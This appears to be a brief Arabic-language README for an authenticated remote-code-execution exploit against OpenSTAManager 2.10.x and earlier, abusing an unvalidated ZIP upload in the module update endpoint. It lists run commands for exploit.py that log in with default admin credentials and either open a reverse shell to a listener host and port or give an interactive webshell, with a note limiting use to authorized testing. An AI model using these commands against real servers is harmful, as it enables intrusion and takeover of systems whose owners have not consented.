
استغلال تنفيذ تعليمات برمجية عن بُعد مصادق عليه لـ OpenSTAManager عبر رفع ZIP غير مُتحقق منه، يوفر شل عكسية وقشرة ويب تفاعلية لاختبار الاختراق المصرح به.
تنفيذ تعليمات برمجية عن بعد (RCE) موثَّق عبر تحميل ZIP غير مُتحقَّق منه في نقطة تحديث الوحدة.
المتأثر: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
للاستخدام في اختبار الاختراق المصرح به والأغراض التعليمية فقط.